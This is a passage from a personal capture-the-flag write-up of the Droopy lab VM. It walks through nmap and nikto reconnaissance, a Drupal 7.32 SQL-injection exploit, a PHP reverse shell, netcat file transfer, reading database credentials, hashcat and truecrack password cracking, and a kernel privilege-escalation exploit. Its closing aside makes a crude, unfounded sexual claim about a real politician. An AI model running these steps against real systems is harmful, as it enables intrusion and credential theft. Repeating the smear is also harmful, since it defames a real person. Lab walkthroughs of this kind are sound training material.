| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ 
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...
MAC Address: 08:00:27:65:24:9C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4

First I thought that the MD5 was a flag or something. But then I read that that is the standard way for nmap to output if it doesn’t know the service.

The robots file is just filled with stuff.

Among the many files was this.
http://droopy.dev/CHANGELOG.txt
Drupal 7.30, 2014-07-24

This reminded me about a huge vulnerability that was in drupal a few years ago, that I had heard about.

I continued the scanning by running nikto and then checking out the info.php file to see what I could find.

This is some of all the info.

http://droopy.dev/info.php
PHP Version 5.5.9-1ubuntu4.5
Hostname:Port droopy.knight139.co.uk:80 
User/Group www-data(33)/33 
Apache Version Apache/2.4.7 (Ubuntu) 
Loaded Modules core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php5 mod_rewrite mod_setenvif mod_status 

DOCUMENT_ROOT /var/www/html 
SERVER_ADMIN webmaster@localhost 

Mysql
Client API version 5.5.40 

PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 

The default apache-page was also found.
http://droopy.dev/index.html

I tried to brute-force the login. This made the server block my IP. And I also think I made it run out of memory or something. Because is subsequently crashed. Great. So I restarted the VM fresh again. And this time I checked out the drupal-exploit.

So I searched for exploits on the exploits-database.
There I found four exploits that are called something along the lines of: Drupal Core <= 7.32 – SQL Injection.
Or similar. Two were written in python two in php. I just picked one, and downloaded it and ran it. Which was pretty stupid, because I created, by default in the exploit, a user with the username admin. So I overwrote the original user.
So once I later gained access, and checked in the database. I only found my own user. Otherwise I would have been able to crack the hash of the original user and that password could have been good to know.

Anyhow, I gained access and after some googeling I figured out how to allow php in drupal (modules/php-filter). And I uploaded the php-reverse-shell.ph that I found here:
usr/share/laudanum/php/php-reverse-shell.php

Privilege escalation

Now I had shell for user: www-data. So I went to /tmp and started netcat to transfer my enumeration-file.

nc -lvp 3333 > enum.sh

Then I sent the file with:

nc 192.168.1.104 3333 < enum.sh

Then: chmod +x enum.sh

Among other things I found:

uid=1000(gsuser) gid=1000(gsuser) groups=1000(gsuser),24(cdrom),30(dip),46(plugdev),110(lpadmin
hostname is:
HOSTNAME=dhcppc5
#In the hosts file I find this.
127.0.1.1	droopy.knight139.co.uk	droopy

I remembered that every web-server that runs mysql has the logins for it in some file. So after some snooping-around I found the file:

/var/www/html/sites/default

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'nimda',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

So I log in to mysql.

mysql -u drupaluser -p drupal
password: nimda

SHOW tables;

mysql> SELECT * FROM users;
SELECT * FROM users;

$S$DLx/ePXpg18r5tnZs8aHkngNTWpyjyMLvPvC0gdaEjo4agY8Iyym

So I went here: http://www.onlinehashcrack.com/hash-identification.php#res
To identify what type of hash it was.

It turns out it is a SHA-512.
– SHA-512(Drupal)

I study the commands of hashcat and found this:

hashcat -m 7900 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule

7900 is the drupal-mode.

Meanwhile I continue to look around and found an email in /var/spool/mail:

From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave

Okay, so it talks about an encrypted file. From a guy named Dave.

It looks like the encrypted file can be decrypted with a password that is found in the rockyou dictionary.
We also know that the password is less than 11 characters, and it has something to do with an academy.
And it is also the name of a song by the Jam.

So I started listening to some songs by The Jam a start looking for the encrypted file. But I couldn’t really find anything useful.

After some minor cheating I learn that it is a good idea to look for privilege-escalation exploits. So I search exploit-database again and find several exploits. I download this one: https://www.exploit-db.com/exploits/37292/
Transfered it over to the VM with nc. Then gcc, chmod and execute, and now I am root. BOOM! Fast when stuff just works.

In /root i found a file called dave.tc.
After some googeling I found out that .tc probably is a true-crypt file. And after some more googeling I learned that there is a program called truecrack.
After a lot of struggling I found that with sed we can remove all words in our dictionary that are shorter than 11 characters.

I did it with this command.
The -i flag is important. It makes the changes in the current file. Without it nothing happens. As I learned.

sed -i -r '/^.{0,10}$/d' rr.txt   

So now we have a list with 1.8 millions.
wc -l rr.txt
1879453 rr.txt

Then I did
grep acade rr.txt > rr2.txt

To get all words containing the work academy. As it was mentioned in the email.

Then again:

truecrack -t dave.tc -k sha512 -b 8 -w rr2.txt -v 

Found password:		"etonacademy"
Password length:	"12"

On this page I learned how to mount a truecrypt-volume. So I did that.
https://tails.boum.org/doc/encryption_and_privacy/truecrypt/index.en.html

mkdir /media/dave

mount /dev/mapper/dave /media/dave
ls /media/dave/
buller  lost+found  panama

In the buller dir there is a file called bullingdon-crest.
https://en.wikipedia.org/wiki/Bullingdon_Club

Now I get it. The Dave character is David Cameron. And I guess the shares.jpg refers to his corrupt family’s holdings in off-shore banks. And the pig in .secret is of course the infamous pig he most likely fucked. And in the .top dir is the flag. Pretty clever ending to a great VM!

Conclusion

So on this VM I really learned a lot!
The most important thing I think was: always check the exploit-database!
All it really took was to search for two exploits to gain root. First to enter drupal-admin and then to elevate to root.

I really liked it because it felt very real. The drupal and priv-escalation exploits are both very real. Thanks to knightmare for a great VM!